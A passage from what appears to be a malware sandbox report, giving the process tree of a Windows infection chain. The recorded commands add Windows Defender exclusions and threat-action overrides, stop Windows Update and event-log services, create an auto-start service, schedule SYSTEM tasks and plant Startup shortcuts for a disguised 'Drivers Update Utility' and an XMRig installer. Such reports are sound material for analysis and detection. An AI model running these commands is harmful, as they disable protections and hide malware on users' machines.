                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                        12⤵
                                                                                                                          PID:5388
                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                            13⤵
                                                                                                                              PID:5400
                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                          forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                          11⤵
                                                                                                                            PID:6052
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                              12⤵
                                                                                                                                PID:5656
                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                  13⤵
                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                  PID:6060
                                                                                                                                  • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                    14⤵
                                                                                                                                      PID:3676
                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        15⤵
                                                                                                                                          PID:5512
                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                                                                                10⤵
                                                                                                                                  PID:2024
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                    11⤵
                                                                                                                                      PID:5512
                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                        12⤵
                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        PID:3680
                                                                                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                          13⤵
                                                                                                                                            PID:5684
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /CREATE /TN "bRfJDuKmNsszhfPRJj" /SC once /ST 01:15:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSF695.tmp\Install.exe\" oU /tmmdidyl 385119 /S" /V1 /F
                                                                                                                                      10⤵
                                                                                                                                      • Drops file in Windows directory
                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                      PID:4380
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1000006001\FirstZ.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\1000006001\FirstZ.exe"
                                                                                                                                7⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Drops file in System32 directory
                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                PID:3656
                                                                                                                                • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                  8⤵
                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                  PID:1488
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                  8⤵
                                                                                                                                    PID:6108
                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      9⤵
                                                                                                                                        PID:3596
                                                                                                                                      • C:\Windows\system32\wusa.exe
                                                                                                                                        wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                        9⤵
                                                                                                                                          PID:6136
                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                        C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                        8⤵
                                                                                                                                        • Launches sc.exe
                                                                                                                                        PID:5052
                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                        C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                        8⤵
                                                                                                                                        • Launches sc.exe
                                                                                                                                        PID:5232
                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          9⤵
                                                                                                                                            PID:4500
                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                          C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                          8⤵
                                                                                                                                          • Launches sc.exe
                                                                                                                                          PID:5812
                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                          C:\Windows\system32\sc.exe stop bits
                                                                                                                                          8⤵
                                                                                                                                          • Launches sc.exe
                                                                                                                                          PID:5872
                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                          C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                          8⤵
                                                                                                                                          • Launches sc.exe
                                                                                                                                          PID:4304
                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                          8⤵
                                                                                                                                          • Power Settings
                                                                                                                                          PID:3700
                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                          8⤵
                                                                                                                                          • Power Settings
                                                                                                                                          PID:5000
                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                          8⤵
                                                                                                                                          • Power Settings
                                                                                                                                          PID:1260
                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                          8⤵
                                                                                                                                          • Power Settings
                                                                                                                                          PID:6020
                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                          C:\Windows\system32\sc.exe delete "WSNKISKT"
                                                                                                                                          8⤵
                                                                                                                                          • Launches sc.exe
                                                                                                                                          PID:372
                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                          C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
                                                                                                                                          8⤵
                                                                                                                                          • Launches sc.exe
                                                                                                                                          PID:380
                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                          C:\Windows\system32\sc.exe stop eventlog
                                                                                                                                          8⤵
                                                                                                                                          • Launches sc.exe
                                                                                                                                          PID:2548
                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            9⤵
                                                                                                                                              PID:2244
                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                            C:\Windows\system32\sc.exe start "WSNKISKT"
                                                                                                                                            8⤵
                                                                                                                                            • Launches sc.exe
                                                                                                                                            PID:2036
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000009001\setup.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\1000009001\setup.exe"
                                                                                                                                          7⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:3828
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS904.tmp\Install.exe
                                                                                                                                            .\Install.exe
                                                                                                                                            8⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:3672
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSB65.tmp\Install.exe
                                                                                                                                              .\Install.exe /Rdprdidxe "385134" /S
                                                                                                                                              9⤵
                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                              • Checks computer location settings
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Enumerates system info in registry
                                                                                                                                              PID:5028
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                10⤵
                                                                                                                                                  PID:6000
                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    11⤵
                                                                                                                                                      PID:4676
                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                      forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                      11⤵
                                                                                                                                                        PID:3340
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                          12⤵
                                                                                                                                                            PID:6116
                                                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                              13⤵
                                                                                                                                                                PID:6012
                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                            forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                            11⤵
                                                                                                                                                              PID:4500
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                12⤵
                                                                                                                                                                  PID:4040
                                                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                    13⤵
                                                                                                                                                                      PID:1704
                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                  forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                  11⤵
                                                                                                                                                                    PID:2244
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                      12⤵
                                                                                                                                                                        PID:5576
                                                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                          13⤵
                                                                                                                                                                            PID:5472
                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                        11⤵
                                                                                                                                                                          PID:5136
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                            12⤵
                                                                                                                                                                              PID:956
                                                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                13⤵
                                                                                                                                                                                  PID:5672
                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                              11⤵
                                                                                                                                                                                PID:5608
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                  12⤵
                                                                                                                                                                                    PID:3596
                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                      13⤵
                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                      PID:1740
                                                                                                                                                                                      • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                        "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                        14⤵
                                                                                                                                                                                          PID:5760
                                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                                                                                                                                  10⤵
                                                                                                                                                                                    PID:4700
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                                                                      11⤵
                                                                                                                                                                                        PID:5456
                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                                                                          12⤵
                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                          PID:5748
                                                                                                                                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                                                                            13⤵
                                                                                                                                                                                              PID:4412
                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                        schtasks /CREATE /TN "bRfJDuKmNsszhfPRJj" /SC once /ST 01:15:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSB65.tmp\Install.exe\" oU /HMwdidXO 385134 /S" /V1 /F
                                                                                                                                                                                        10⤵
                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                        PID:5700
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1000070001\monster.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\1000070001\monster.exe"
                                                                                                                                                                              5⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              PID:5532
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\onefile_5532_133634060231364044\stub.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\1000070001\monster.exe"
                                                                                                                                                                                6⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                PID:2656
                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c "ver"
                                                                                                                                                                                  7⤵
                                                                                                                                                                                    PID:4588
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1000075001\legs.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\1000075001\legs.exe"
                                                                                                                                                                                5⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                PID:5972
                                                                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                  6⤵
                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                  PID:2164
                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5972 -s 268
                                                                                                                                                                                  6⤵
                                                                                                                                                                                  • Program crash
                                                                                                                                                                                  PID:5540
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1000082001\quickaccesspopup.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\1000082001\quickaccesspopup.exe"
                                                                                                                                                                                5⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                PID:5408
                                                                                                                                                                                • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                  C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:428
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1000088001\spain.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\1000088001\spain.exe"
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  PID:2660
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000088001\spain.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\1000088001\spain.exe"
                                                                                                                                                                                    6⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:6012
                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:'""
                                                                                                                                                                                      7⤵
                                                                                                                                                                                        PID:1940
                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          powershell -Command "Add-MpPreference -ExclusionPath 'C:'"
                                                                                                                                                                                          8⤵
                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                          PID:5964
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Drivers Update Utility v1.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Drivers Update Utility v1.exe"
                                                                                                                                                                                        7⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        PID:5776
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Drivers Update Utility v1.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Drivers Update Utility v1.exe"
                                                                                                                                                                                          8⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          PID:3928
                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            powershell -Command " $WshShell = New-Object -ComObject WScript.Shell $Shortcut = $WshShell.CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XMRigInstaller.lnk') $Shortcut.TargetPath = 'C:\Users\Admin\AppData\Local\Temp\Drivers Update Utility v1.exe' $Shortcut.Save() "
                                                                                                                                                                                            9⤵
                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                            • Drops startup file
                                                                                                                                                                                            PID:5668
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Drivers Update Utility v2.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Drivers Update Utility v2.exe"
                                                                                                                                                                                        7⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        PID:2708
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Drivers Update Utility v2.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Drivers Update Utility v2.exe"
                                                                                                                                                                                          8⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          PID:3252
                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            powershell -Command " $WshShell = New-Object -ComObject WScript.Shell $Shortcut = $WshShell.CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ClientPersist.lnk') $Shortcut.TargetPath = 'C:\Windows\System32\Drivers Update Utility.exe' $Shortcut.Save() "
                                                                                                                                                                                            9⤵
                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                            PID:1664
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1000016001\d08e48f40f.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\1000016001\d08e48f40f.exe"
                                                                                                                                                                                3⤵
                                                                                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Identifies Wine through registry keys
                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                PID:4384
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1000017001\26dbfc61ff.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\1000017001\26dbfc61ff.exe"
                                                                                                                                                                                3⤵
                                                                                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Identifies Wine through registry keys
                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                                PID:1592
                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
                                                                                                                                                                                  4⤵
                                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                                  PID:5056
                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x10c,0x110,0x114,0xe8,0x118,0x7ffc1a2bab58,0x7ffc1a2bab68,0x7ffc1a2bab78
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:3564
                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1708 --field-trial-handle=1992,i,16122635009866968439,13252846517868265168,131072 /prefetch:2
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:988
                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1928 --field-trial-handle=1992,i,16122635009866968439,13252846517868265168,131072 /prefetch:8
                                                                                                                                                                                        5⤵
                                                                                                                                                                                          PID:3216
                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2256 --field-trial-handle=1992,i,16122635009866968439,13252846517868265168,131072 /prefetch:8
                                                                                                                                                                                          5⤵
                                                                                                                                                                                            PID:2652
                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3016 --field-trial-handle=1992,i,16122635009866968439,13252846517868265168,131072 /prefetch:1
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:672
                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3036 --field-trial-handle=1992,i,16122635009866968439,13252846517868265168,131072 /prefetch:1
                                                                                                                                                                                              5⤵
                                                                                                                                                                                                PID:4956
                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4348 --field-trial-handle=1992,i,16122635009866968439,13252846517868265168,131072 /prefetch:1
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                  PID:1844
                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
